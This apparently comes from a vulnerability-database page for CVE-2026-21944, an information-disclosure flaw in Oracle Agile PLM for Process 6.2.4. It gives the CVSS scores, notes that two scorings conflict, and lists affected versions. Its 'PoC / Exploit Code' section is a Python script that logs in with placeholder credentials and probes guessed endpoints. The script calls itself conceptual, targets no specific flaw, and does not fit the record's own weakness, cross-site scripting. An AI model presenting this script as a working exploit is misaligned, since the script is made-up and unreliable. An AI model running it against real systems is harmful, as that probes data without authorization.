Security Vulnerability Report
CVE-2026-21944 CVSS 6.5 MEDIUM

CVE-2026-21944

Published: 2026-01-20 22:15:57
Last Modified: 2026-01-29 20:47:57

Description

Vulnerability in the Oracle Agile Product Lifecycle Management for Process product of Oracle Supply Chain (component: Product Quality Management). The supported version that is affected is 6.2.4. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Agile Product Lifecycle Management for Process. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Agile Product Lifecycle Management for Process accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.4:*:*:*:*:*:*:* - VULNERABLE
Oracle Agile Product Lifecycle Management for Process 6.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
'''
CVE-2026-21944 PoC - Oracle Agile PLM for Process unauthorized data access
Note: This is a conceptual PoC for demonstration purposes only.
Requires proper authorization and ethical testing.
'''
import requests
import sys

target = "https://target-oracle-agile-plm.com"


# Authenticate as a low-privilege user
def authenticate_low_privilege():
    session = requests.Session()
    login_url = f"{target}/Agile/PLMServlet"
    credentials = {
        'username': 'low_privilege_user',
        'password': 'password123'
    }
    response = session.post(login_url, data=credentials)
    return session if response.status_code == 200 else None


# Attempt unauthorized access to Product Quality Management data
def exploit_unauthorized_access(session):
    # Target endpoints - Product Quality Management component
    target_endpoints = [
        f"{target}/Agile/ProductQualityManagement/data",
        f"{target}/Agile/PLMServlet?module=quality&action=list",
        f"{target}/Agile/api/quality/auditRecords",
        f"{target}/Agile/quality/reports/download"
    ]
    for endpoint in target_endpoints:
        try:
            response = session.get(endpoint, timeout=10)
            if response.status_code == 200 and 'sensitive' in response.text.lower():
                print(f"[+] Potential unauthorized access at: {endpoint}")
                print(f"[+] Response length: {len(response.text)}")
                return True
        except requests.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")
    return False


if __name__ == "__main__":
    print("CVE-2026-21944 Exploitation Test")
    session = authenticate_low_privilege()
    if session:
        print("[+] Authenticated successfully")
        exploit_unauthorized_access(session)
    else:
        print("[-] Authentication failed")

References

https://www.oracle.com/security-alerts/cpujan2026.html (Vendor Advisory, source: [email protected])

NVD Record Details

CVE ID
CVE-2026-21944
Source Identifier
[email protected]
Published
2026-01-20T22:15:57.267
Last Modified
2026-01-29T20:47:56.817
Status
Analyzed
Weakness (Secondary, source 134c704f-9b21-4f2e-91b3-4a467353bcc0)
CWE-79
Affected Configuration
cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.4:*:*:*:*:*:*:* (vulnerable; match criteria ID 4F85AABE-B854-4887-A641-2102D355F9E3)

CVSS 3.1 Metrics

Secondary (source: [email protected])
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Base Score: 6.5 MEDIUM (Attack Vector: Network, Attack Complexity: Low, Privileges Required: Low, User Interaction: None, Scope: Unchanged, Confidentiality: High, Integrity: None, Availability: None)
Exploitability Score: 2.8; Impact Score: 3.6

Primary (source: [email protected])
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N
Base Score: 6.8 MEDIUM (Attack Vector: Network, Attack Complexity: Low, Privileges Required: Low, User Interaction: Required, Scope: Changed, Confidentiality: High, Integrity: None, Availability: None)
Exploitability Score: 2.3; Impact Score: 4.0

Note that the two scorings differ: the Primary vector requires user interaction (UI:R) and has a changed scope (S:C), whereas the Secondary vector has UI:N and S:U. The 6.5 score shown in the header of this report follows the Secondary vector.